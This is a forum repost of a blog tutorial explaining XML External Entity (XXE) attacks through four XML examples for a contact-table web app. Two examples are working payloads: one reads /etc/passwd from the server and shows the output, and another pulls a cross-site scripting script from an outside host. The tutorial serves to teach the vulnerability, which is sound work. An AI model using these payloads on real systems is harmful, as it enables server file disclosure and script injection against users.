Jump to content
Nytro

XML External Entity attack (XXE) in a Nutshell

By Nytro, in Securitate web

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

XML External Entity attack (XXE) in a Nutshell

Posted on April 3, 2015 by chs

The XXE attack has been around for a few years, but hasn’t gotten much attention until the last couple of years with some high-profile cases in Facebook and PayPal.

So, what is the XML External Entity attack? XXE is an abbreviation for XML External Entity. It is a part of the XML spec that allows a document to have entities that resolve to someplace external (not within the same document).

Some examples probably describe it best. For example, let’s say that we have a web app that takes as input an xml file and displays it in a table.

Example 1

Here’s a sample input file-

[TABLE=width: 633]

[TR]

[TD=class: line_numbers]1

2

3

4

5

6

7

8

9

10

11

12

13[/TD]

[TD=class: code]<?xml version="1.0" encoding="utf-8"?>

<contacts>

<contact>

<login>bobw</login>

<name>Bob Walker</name>

<email>bob@bob.com</email>

</contact>

<contact>

<login>ajones</login>

<name>Alice Jones</name>

<email>alice@alice.com</email>

</contact>

</contacts>[/TD]

[/TR]

[/TABLE]

This is processed and displays the following-

[TABLE=width: 639]

[TR]

[TH]login[/TH]

[TH]name[/TH]

[TH]email[/TH]

[/TR]

[TR]

[TD]bobw[/TD]

[TD]Bob Walker[/TD]

[TD]bob@bob.com[/TD]

[/TR]

[TR]

[TD]ajones[/TD]

[TD]Alice Jones[/TD]

[TD]alice@alice.com[/TD]

[/TR]

[/TABLE]

Pretty Straightforward, right?

Example 2

Now, let’s take the same example and add an entity-

[TABLE=width: 633]

[TR]

[TD=class: line_numbers]1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16[/TD]

[TD=class: code]<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

<!ENTITY foo "Foo">

]>

<contacts>

<contact>

<login>&foo;</login>

<name>Bob Walker</name>

<email>bob@bob.com</email>

</contact>

<contact>

<login>ajones</login>

<name>Alice Jones</name>

<email>alice@alice.com</email>

</contact>

</contacts>[/TD]

[/TR]

[/TABLE]

This processes and displays-

[TABLE=width: 639]

[TR]

[TH]login[/TH]

[TH]name[/TH]

[TH]email[/TH]

[/TR]

[TR]

[TD]Foo[/TD]

[TD]Bob Walker[/TD]

[TD]bob@bob.com[/TD]

[/TR]

[TR]

[TD]ajones[/TD]

[TD]Alice Jones[/TD]

[TD]alice@alice.com[/TD]

[/TR]

[/TABLE]

What happened? On line 3 of the xml file we created an entity called foo which is the string, “Foo”. We then use that entity, &foo, in place of Bob’s username on line 7. While processing the document the parser substituted “Foo” when it saw &foo;.

Example 3Now let’s do something really interesting. Consider the following-

[TABLE=width: 633]

[TR]

[TD=class: line_numbers]1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16[/TD]

[TD=class: code]<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

<!ENTITY foo SYSTEM "file:///etc/passwd">

]>

<contacts>

<contact>

<login>&foo;</login>

<name>Bob Walker</name>

<email>bob@bob.com</email>

</contact>

<contact>

<login>ajones</login>

<name>Alice Jones</name>

<email>alice@alice.com</email>

</contact>

</contacts>[/TD]

[/TR]

[/TABLE]

This processes and displays-

[TABLE=width: 639]

[TR]

[TH]login[/TH]

[TH]name[/TH]

[TH]email[/TH]

[/TR]

[TR]

[TD]root:X:0:0:root:/root:/bin/bash <redacted>[/TD]

[TD]Bob Walker[/TD]

[TD]bob@bob.com[/TD]

[/TR]

[TR]

[TD]ajones[/TD]

[TD]Alice Jones[/TD]

[TD]alice@alice.com[/TD]

[/TR]

[/TABLE]

What did it do? On line 3, the keyword SYSTEM means that this entity reference is external to the document. In this case, the external entity references /etc/passwd on the system that is processing the xml. This causes the contents of /etc/passwd to be pulled into the document and then displayed.

Example 4

Up to this point, the attacks have been against the server. How can we attack the user?

Consider this-

[TABLE=width: 633]

[TR]

[TD=class: line_numbers]1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16[/TD]

[TD=class: code]<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

<!ENTITY foo SYSTEM "http://www.bitbucket.me/log/xss.php">

]>

<contacts>

<contact>

<login>&foo;</login>

<name>Bob Walker</name>

<email>bob@bob.com</email>

</contact>

<contact>

<login>ajones</login>

<name>Alice Jones</name>

<email>alice@alice.com</email>

</contact>

</contacts>[/TD]

[/TR]

[/TABLE]

What do you think the external entity reference does here? It returns <script>alert(‘xss’)</script>. When the table displays that script is executed in the browser. (I’m not displaying the results like in previous examples because it would execute while you are reading this and it’s just an example showing that it’s vulnerable.).

I hope these examples give you a basic understanding of what the XXE vulnerability is. Next week I’ll talk about how to prevent it.

Sursa: XML External Entity attack (XXE) in a Nutshell - Geeky Thoughts

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...